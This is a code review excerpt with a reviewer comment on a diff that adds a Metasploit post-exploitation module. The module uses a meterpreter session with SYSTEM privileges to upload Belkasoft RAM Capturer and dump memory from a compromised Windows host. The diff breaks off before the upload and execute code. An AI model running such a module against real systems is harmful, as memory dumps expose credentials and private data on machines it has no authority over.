modules/post/windows/gather/forensics/memorydump.rb

```diff
@@ -0,0 +1,230 @@
+#
+# This Module has an embred Belkasoft RAM Capturer version of 2018-08
+# Available at https://belkasoft.com/ram-capturer
+##
+
+#
+# Forensic memory dump using Belkasoft RAM Capturer
+#
+# Helvio Junior (M4v3r1cK) m4v3r1ck.hjr [at] gmail.com
+#    https://www.helviojunior.com.br
+#
+# Other modules repository: https://github.com/helviojunior/metasploit_modules
+#
+# Standard Library
+#
+require 'tmpdir'
+
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Windows Gather Memory Dump Imaging',
+      'Description'   => %q{This module will perform a memory dump of remote machine},
+      'License'       => MSF_LICENSE,
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter'],
+      'Author'        => ['Helvio Junior (M4v3r1cK) <m4v3r1ck.hjr[at]gmail.com>']
+    ))
+    register_options(
+      [
+        OptString.new('RAMCAPTURE_PATH',[true,'Path of Belkasoft RAM Capturer',''])
+      ])
+  end
+
+  def run
+    vprint_status("Determining session platform, type and privileges")
+    case session.platform
+    when 'windows'
+      if session.type != "meterpreter"
+        print_error "Only meterpreter sessions are supported on Windows hosts"
+        return
+      end
+      @platform = :windows
+    else
+      print_error("Unsupported platform: #{session.platform}")
+      return
+    end
+
+    unless got_root
+        print_error("You need SYSTEM privileges for use this script")
+        return
+    end
+
+    #Get Windows environment variables
+    return unless get_env_vars
+    
+    print_status("Executing Dump of #{@win_env_vars['arch']} architherure host")
+
+    send_and_execute
+
+    print_good("0wn3d by M4v3r1cK!")
+  end
+
+  def get_env_vars
+    @win_env_vars = {}
+    
+    env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive', 'PROCESSOR_ARCHITECTURE', 'PROCESSOR_ARCHITEW6432')
+
+    @win_env_vars['temp'] = env_vars['TEMP'] + "\\"
+    @win_env_vars['system_drive'] = env_vars['SystemDrive']
+    @win_env_vars['arch'] = 'x86'
+
+    if env_vars['PROCESSOR_ARCHITECTURE'].nil? or env_vars['PROCESSOR_ARCHITECTURE'].empty?
+        print_error("Was not possible to determine Windows Architherure (x86 oe x64)")
+        return
+    end
+
+    if env_vars['PROCESSOR_ARCHITECTURE'] =~ /amd64/i
+        @win_env_vars['arch'] = 'x64'
+    end
+
+    if env_vars['PROCESSOR_ARCHITEW6432'] =~ /amd64/i
+        @win_env_vars['arch'] = 'x64'
+    end
+
+    true
+  end
+
+  def send_and_execute
+    
+
+    new_file = Rex::Text::rand_text_alpha(5 + rand(3)) + ".vmem"
+    tmp = Dir::tmpdir + "/" + new_file
+    mem_dump = @win_env_vars['temp'] + new_file
+
+    cmd = ""
+    prog2check = ""
+
+    print_warning("Sending file, this may take some time...")
+    files = Array[]
+
+    if @win_env_vars['arch'] == "x64"
```

Comment:
This conditional appears to contain a lot of duplicated code. It might be cleaner to set a variable and reduce the two conditional branches into one code path.